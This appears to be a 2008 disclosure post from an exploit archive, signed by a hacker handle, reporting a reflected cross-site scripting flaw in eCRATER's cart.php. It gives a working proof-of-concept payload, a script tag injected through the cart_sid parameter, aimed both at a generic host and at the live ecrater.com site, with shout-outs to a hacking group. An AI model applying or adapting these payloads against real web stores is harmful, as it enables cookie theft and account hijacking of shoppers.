eCRATER suffers from a cross site scripting vulnerability in cart.php.
daaa450c2a4f11ff923e0e76527ba8843752c37fbc731a401b492e1b8f2381b3
[~]----------------------------------------------------------------
[~] eCRATER [cart.php] -XSS- [Cross Site Scripting Vulnerabilities]
[~]
[~] http://www.ecrater.com
[~] ----------------------------------------------------------
[~] Bug founded by d3v1l
[~]
[~] Date:02.10.2008
[~]
[~]
[~] d3v1l@spoofer.com
[~]
[~] -----------------------------------------------------------
[~] Greetz tO ALL:-
[~]
[~] Security-Shell Members ( http://security-sh3ll.com )
[~]
[~] Pentest| Gibon| Pig
[~]-------------------------------------------------------------
[~]
[~]
[~] Exploit:- http://www.site.com/cart.php?cart_sid="<script>alert(document.cookie)</script>
[~]
[~] Demo:- http://www.ecrater.com/cart.php?cart_sid="<script>alert(document.cookie)</script>
[~]
[~] About:-
[~]
[~]eCRATER.com is both a free web store builder and a free online marketplace.
[~]Sellers can easily create their own free online store in minutes.
[~]Buyers can easily browse and compare between thousands of products.
[~]Sellers receive free website hosting, a free subdomain and a powerful admin tool to manage their free online stores.
[~]All products are posted to Google Product Search as well.
[~]---------------------------------------------------------------------------------------------------------------------